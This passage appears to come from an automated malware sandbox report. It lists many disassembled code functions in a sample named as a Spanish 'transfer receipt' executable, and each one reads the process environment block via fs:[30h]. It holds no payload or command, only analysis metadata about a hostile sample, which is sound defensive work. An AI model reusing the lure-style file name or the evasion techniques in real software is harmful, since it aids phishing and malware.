            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A336EE mov eax, dword ptr fs:[00000030h]6_2_36A336EE
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A336EE mov eax, dword ptr fs:[00000030h]6_2_36A336EE
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A336EE mov eax, dword ptr fs:[00000030h]6_2_36A336EE
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D16CF mov eax, dword ptr fs:[00000030h]6_2_369D16CF
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A5D6F0 mov eax, dword ptr fs:[00000030h]6_2_36A5D6F0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369AB6C0 mov eax, dword ptr fs:[00000030h]6_2_369AB6C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369AB6C0 mov eax, dword ptr fs:[00000030h]6_2_369AB6C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369AB6C0 mov eax, dword ptr fs:[00000030h]6_2_369AB6C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369AB6C0 mov eax, dword ptr fs:[00000030h]6_2_369AB6C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369AB6C0 mov eax, dword ptr fs:[00000030h]6_2_369AB6C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369AB6C0 mov eax, dword ptr fs:[00000030h]6_2_369AB6C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A5F6C7 mov eax, dword ptr fs:[00000030h]6_2_36A5F6C7
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A616CC mov eax, dword ptr fs:[00000030h]6_2_36A616CC
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A616CC mov eax, dword ptr fs:[00000030h]6_2_36A616CC
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A616CC mov eax, dword ptr fs:[00000030h]6_2_36A616CC
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A616CC mov eax, dword ptr fs:[00000030h]6_2_36A616CC
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D36EF mov eax, dword ptr fs:[00000030h]6_2_369D36EF
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CD6E0 mov eax, dword ptr fs:[00000030h]6_2_369CD6E0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CD6E0 mov eax, dword ptr fs:[00000030h]6_2_369CD6E0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A3616 mov eax, dword ptr fs:[00000030h]6_2_369A3616
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A3616 mov eax, dword ptr fs:[00000030h]6_2_369A3616
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A75636 mov eax, dword ptr fs:[00000030h]6_2_36A75636
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D1607 mov eax, dword ptr fs:[00000030h]6_2_369D1607
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369DF603 mov eax, dword ptr fs:[00000030h]6_2_369DF603
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F626 mov eax, dword ptr fs:[00000030h]6_2_3699F626
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F626 mov eax, dword ptr fs:[00000030h]6_2_3699F626
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F626 mov eax, dword ptr fs:[00000030h]6_2_3699F626
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F626 mov eax, dword ptr fs:[00000030h]6_2_3699F626
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F626 mov eax, dword ptr fs:[00000030h]6_2_3699F626
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F626 mov eax, dword ptr fs:[00000030h]6_2_3699F626
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F626 mov eax, dword ptr fs:[00000030h]6_2_3699F626
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F626 mov eax, dword ptr fs:[00000030h]6_2_3699F626
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F626 mov eax, dword ptr fs:[00000030h]6_2_3699F626
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A3D660 mov eax, dword ptr fs:[00000030h]6_2_36A3D660
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D9660 mov eax, dword ptr fs:[00000030h]6_2_369D9660
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D9660 mov eax, dword ptr fs:[00000030h]6_2_369D9660
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A297A9 mov eax, dword ptr fs:[00000030h]6_2_36A297A9
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A2F7AF mov eax, dword ptr fs:[00000030h]6_2_36A2F7AF
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A2F7AF mov eax, dword ptr fs:[00000030h]6_2_36A2F7AF
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A2F7AF mov eax, dword ptr fs:[00000030h]6_2_36A2F7AF
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A2F7AF mov eax, dword ptr fs:[00000030h]6_2_36A2F7AF
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A2F7AF mov eax, dword ptr fs:[00000030h]6_2_36A2F7AF
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A737B6 mov eax, dword ptr fs:[00000030h]6_2_36A737B6
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A5D7B0 mov eax, dword ptr fs:[00000030h]6_2_36A5D7B0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A5D7B0 mov eax, dword ptr fs:[00000030h]6_2_36A5D7B0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F7BA mov eax, dword ptr fs:[00000030h]6_2_3699F7BA
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F7BA mov eax, dword ptr fs:[00000030h]6_2_3699F7BA
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F7BA mov eax, dword ptr fs:[00000030h]6_2_3699F7BA
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F7BA mov eax, dword ptr fs:[00000030h]6_2_3699F7BA
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F7BA mov eax, dword ptr fs:[00000030h]6_2_3699F7BA
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F7BA mov eax, dword ptr fs:[00000030h]6_2_3699F7BA
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F7BA mov eax, dword ptr fs:[00000030h]6_2_3699F7BA
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F7BA mov eax, dword ptr fs:[00000030h]6_2_3699F7BA
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699F7BA mov eax, dword ptr fs:[00000030h]6_2_3699F7BA
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CD7B0 mov eax, dword ptr fs:[00000030h]6_2_369CD7B0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A5F78A mov eax, dword ptr fs:[00000030h]6_2_36A5F78A
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A57C0 mov eax, dword ptr fs:[00000030h]6_2_369A57C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A57C0 mov eax, dword ptr fs:[00000030h]6_2_369A57C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A57C0 mov eax, dword ptr fs:[00000030h]6_2_369A57C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A17EC mov eax, dword ptr fs:[00000030h]6_2_369A17EC
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A17EC mov eax, dword ptr fs:[00000030h]6_2_369A17EC
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A17EC mov eax, dword ptr fs:[00000030h]6_2_369A17EC
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369AD7E0 mov ecx, dword ptr fs:[00000030h]6_2_369AD7E0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369DF71F mov eax, dword ptr fs:[00000030h]6_2_369DF71F
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369DF71F mov eax, dword ptr fs:[00000030h]6_2_369DF71F
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A5F72E mov eax, dword ptr fs:[00000030h]6_2_36A5F72E
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A6972B mov eax, dword ptr fs:[00000030h]6_2_36A6972B
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A5702 mov eax, dword ptr fs:[00000030h]6_2_369A5702
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A5702 mov eax, dword ptr fs:[00000030h]6_2_369A5702
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A7703 mov eax, dword ptr fs:[00000030h]6_2_369A7703
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A7B73C mov eax, dword ptr fs:[00000030h]6_2_36A7B73C
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A7B73C mov eax, dword ptr fs:[00000030h]6_2_36A7B73C
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A7B73C mov eax, dword ptr fs:[00000030h]6_2_36A7B73C
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A7B73C mov eax, dword ptr fs:[00000030h]6_2_36A7B73C
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A973A mov eax, dword ptr fs:[00000030h]6_2_369A973A
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A973A mov eax, dword ptr fs:[00000030h]6_2_369A973A
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36999730 mov eax, dword ptr fs:[00000030h]6_2_36999730
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36999730 mov eax, dword ptr fs:[00000030h]6_2_36999730
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D5734 mov eax, dword ptr fs:[00000030h]6_2_369D5734
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A3720 mov eax, dword ptr fs:[00000030h]6_2_369A3720
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369BF720 mov eax, dword ptr fs:[00000030h]6_2_369BF720
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369BF720 mov eax, dword ptr fs:[00000030h]6_2_369BF720
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369BF720 mov eax, dword ptr fs:[00000030h]6_2_369BF720
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B3740 mov eax, dword ptr fs:[00000030h]6_2_369B3740
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B3740 mov eax, dword ptr fs:[00000030h]6_2_369B3740
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369B3740 mov eax, dword ptr fs:[00000030h]6_2_369B3740
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A73749 mov eax, dword ptr fs:[00000030h]6_2_36A73749
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4375F mov eax, dword ptr fs:[00000030h]6_2_36A4375F
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4375F mov eax, dword ptr fs:[00000030h]6_2_36A4375F
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4375F mov eax, dword ptr fs:[00000030h]6_2_36A4375F
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4375F mov eax, dword ptr fs:[00000030h]6_2_36A4375F
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4375F mov eax, dword ptr fs:[00000030h]6_2_36A4375F
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699B765 mov eax, dword ptr fs:[00000030h]6_2_3699B765
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699B765 mov eax, dword ptr fs:[00000030h]6_2_3699B765
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699B765 mov eax, dword ptr fs:[00000030h]6_2_3699B765
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699B765 mov eax, dword ptr fs:[00000030h]6_2_3699B765
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A474B0 mov eax, dword ptr fs:[00000030h]6_2_36A474B0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699B480 mov eax, dword ptr fs:[00000030h]6_2_3699B480
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A9486 mov eax, dword ptr fs:[00000030h]6_2_369A9486
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A9486 mov eax, dword ptr fs:[00000030h]6_2_369A9486
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369974B0 mov eax, dword ptr fs:[00000030h]6_2_369974B0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369974B0 mov eax, dword ptr fs:[00000030h]6_2_369974B0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D34B0 mov eax, dword ptr fs:[00000030h]6_2_369D34B0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A494E0 mov eax, dword ptr fs:[00000030h]6_2_36A494E0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A714F6 mov eax, dword ptr fs:[00000030h]6_2_36A714F6
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A714F6 mov eax, dword ptr fs:[00000030h]6_2_36A714F6
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A754DB mov eax, dword ptr fs:[00000030h]6_2_36A754DB
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C340D mov eax, dword ptr fs:[00000030h]6_2_369C340D
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A27410 mov eax, dword ptr fs:[00000030h]6_2_36A27410
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A7547F mov eax, dword ptr fs:[00000030h]6_2_36A7547F
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369AB440 mov eax, dword ptr fs:[00000030h]6_2_369AB440
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369AB440 mov eax, dword ptr fs:[00000030h]6_2_369AB440
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369AB440 mov eax, dword ptr fs:[00000030h]6_2_369AB440
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369AB440 mov eax, dword ptr fs:[00000030h]6_2_369AB440
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369AB440 mov eax, dword ptr fs:[00000030h]6_2_369AB440
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369AB440 mov eax, dword ptr fs:[00000030h]6_2_369AB440
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4B450 mov eax, dword ptr fs:[00000030h]6_2_36A4B450
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4B450 mov eax, dword ptr fs:[00000030h]6_2_36A4B450
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4B450 mov eax, dword ptr fs:[00000030h]6_2_36A4B450
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4B450 mov eax, dword ptr fs:[00000030h]6_2_36A4B450
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A5F453 mov eax, dword ptr fs:[00000030h]6_2_36A5F453
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A1460 mov eax, dword ptr fs:[00000030h]6_2_369A1460
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A1460 mov eax, dword ptr fs:[00000030h]6_2_369A1460
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A1460 mov eax, dword ptr fs:[00000030h]6_2_369A1460
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A1460 mov eax, dword ptr fs:[00000030h]6_2_369A1460
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369A1460 mov eax, dword ptr fs:[00000030h]6_2_369A1460
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369BF460 mov eax, dword ptr fs:[00000030h]6_2_369BF460
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369BF460 mov eax, dword ptr fs:[00000030h]6_2_369BF460
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369BF460 mov eax, dword ptr fs:[00000030h]6_2_369BF460
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369BF460 mov eax, dword ptr fs:[00000030h]6_2_369BF460
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369BF460 mov eax, dword ptr fs:[00000030h]6_2_369BF460
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369BF460 mov eax, dword ptr fs:[00000030h]6_2_369BF460
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A3D5B0 mov eax, dword ptr fs:[00000030h]6_2_36A3D5B0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A3D5B0 mov eax, dword ptr fs:[00000030h]6_2_36A3D5B0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699758F mov eax, dword ptr fs:[00000030h]6_2_3699758F
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699758F mov eax, dword ptr fs:[00000030h]6_2_3699758F
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699758F mov eax, dword ptr fs:[00000030h]6_2_3699758F
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A335BA mov eax, dword ptr fs:[00000030h]6_2_36A335BA
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A335BA mov eax, dword ptr fs:[00000030h]6_2_36A335BA
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A335BA mov eax, dword ptr fs:[00000030h]6_2_36A335BA
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A335BA mov eax, dword ptr fs:[00000030h]6_2_36A335BA
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A5F5BE mov eax, dword ptr fs:[00000030h]6_2_36A5F5BE
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CF5B0 mov eax, dword ptr fs:[00000030h]6_2_369CF5B0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CF5B0 mov eax, dword ptr fs:[00000030h]6_2_369CF5B0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CF5B0 mov eax, dword ptr fs:[00000030h]6_2_369CF5B0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CF5B0 mov eax, dword ptr fs:[00000030h]6_2_369CF5B0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CF5B0 mov eax, dword ptr fs:[00000030h]6_2_369CF5B0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CF5B0 mov eax, dword ptr fs:[00000030h]6_2_369CF5B0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CF5B0 mov eax, dword ptr fs:[00000030h]6_2_369CF5B0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CF5B0 mov eax, dword ptr fs:[00000030h]6_2_369CF5B0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369CF5B0 mov eax, dword ptr fs:[00000030h]6_2_369CF5B0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C15A9 mov eax, dword ptr fs:[00000030h]6_2_369C15A9
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C15A9 mov eax, dword ptr fs:[00000030h]6_2_369C15A9
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C15A9 mov eax, dword ptr fs:[00000030h]6_2_369C15A9
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C15A9 mov eax, dword ptr fs:[00000030h]6_2_369C15A9
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C15A9 mov eax, dword ptr fs:[00000030h]6_2_369C15A9
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A2B594 mov eax, dword ptr fs:[00000030h]6_2_36A2B594
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A2B594 mov eax, dword ptr fs:[00000030h]6_2_36A2B594
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C95DA mov eax, dword ptr fs:[00000030h]6_2_369C95DA
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D55C0 mov eax, dword ptr fs:[00000030h]6_2_369D55C0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C15F4 mov eax, dword ptr fs:[00000030h]6_2_369C15F4
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C15F4 mov eax, dword ptr fs:[00000030h]6_2_369C15F4
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C15F4 mov eax, dword ptr fs:[00000030h]6_2_369C15F4
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C15F4 mov eax, dword ptr fs:[00000030h]6_2_369C15F4
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C15F4 mov eax, dword ptr fs:[00000030h]6_2_369C15F4
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369C15F4 mov eax, dword ptr fs:[00000030h]6_2_369C15F4
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A755C9 mov eax, dword ptr fs:[00000030h]6_2_36A755C9
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A735D7 mov eax, dword ptr fs:[00000030h]6_2_36A735D7
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A735D7 mov eax, dword ptr fs:[00000030h]6_2_36A735D7
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A735D7 mov eax, dword ptr fs:[00000030h]6_2_36A735D7
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A1D5D0 mov eax, dword ptr fs:[00000030h]6_2_36A1D5D0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A1D5D0 mov ecx, dword ptr fs:[00000030h]6_2_36A1D5D0
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4F525 mov eax, dword ptr fs:[00000030h]6_2_36A4F525
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4F525 mov eax, dword ptr fs:[00000030h]6_2_36A4F525
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4F525 mov eax, dword ptr fs:[00000030h]6_2_36A4F525
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4F525 mov eax, dword ptr fs:[00000030h]6_2_36A4F525
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4F525 mov eax, dword ptr fs:[00000030h]6_2_36A4F525
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4F525 mov eax, dword ptr fs:[00000030h]6_2_36A4F525
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4F525 mov eax, dword ptr fs:[00000030h]6_2_36A4F525
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A5B52F mov eax, dword ptr fs:[00000030h]6_2_36A5B52F
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A75537 mov eax, dword ptr fs:[00000030h]6_2_36A75537
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D7505 mov eax, dword ptr fs:[00000030h]6_2_369D7505
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369D7505 mov ecx, dword ptr fs:[00000030h]6_2_369D7505
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369DD530 mov eax, dword ptr fs:[00000030h]6_2_369DD530
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369DD530 mov eax, dword ptr fs:[00000030h]6_2_369DD530
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369AD534 mov eax, dword ptr fs:[00000030h]6_2_369AD534
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369AD534 mov eax, dword ptr fs:[00000030h]6_2_369AD534
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369AD534 mov eax, dword ptr fs:[00000030h]6_2_369AD534
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369AD534 mov eax, dword ptr fs:[00000030h]6_2_369AD534
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369AD534 mov eax, dword ptr fs:[00000030h]6_2_369AD534
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369AD534 mov eax, dword ptr fs:[00000030h]6_2_369AD534
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369DB570 mov eax, dword ptr fs:[00000030h]6_2_369DB570
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_369DB570 mov eax, dword ptr fs:[00000030h]6_2_369DB570
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4B550 mov eax, dword ptr fs:[00000030h]6_2_36A4B550
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4B550 mov eax, dword ptr fs:[00000030h]6_2_36A4B550
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A4B550 mov eax, dword ptr fs:[00000030h]6_2_36A4B550
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_3699B562 mov eax, dword ptr fs:[00000030h]6_2_3699B562
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A692A6 mov eax, dword ptr fs:[00000030h]6_2_36A692A6
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A692A6 mov eax, dword ptr fs:[00000030h]6_2_36A692A6
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A692A6 mov eax, dword ptr fs:[00000030h]6_2_36A692A6
            Source: C:\Users\user\Desktop\justificante de transferencia09454545.exeCode function: 6_2_36A692A6 mov eax, dword ptr fs:[00000030h]6_2_36A692A6
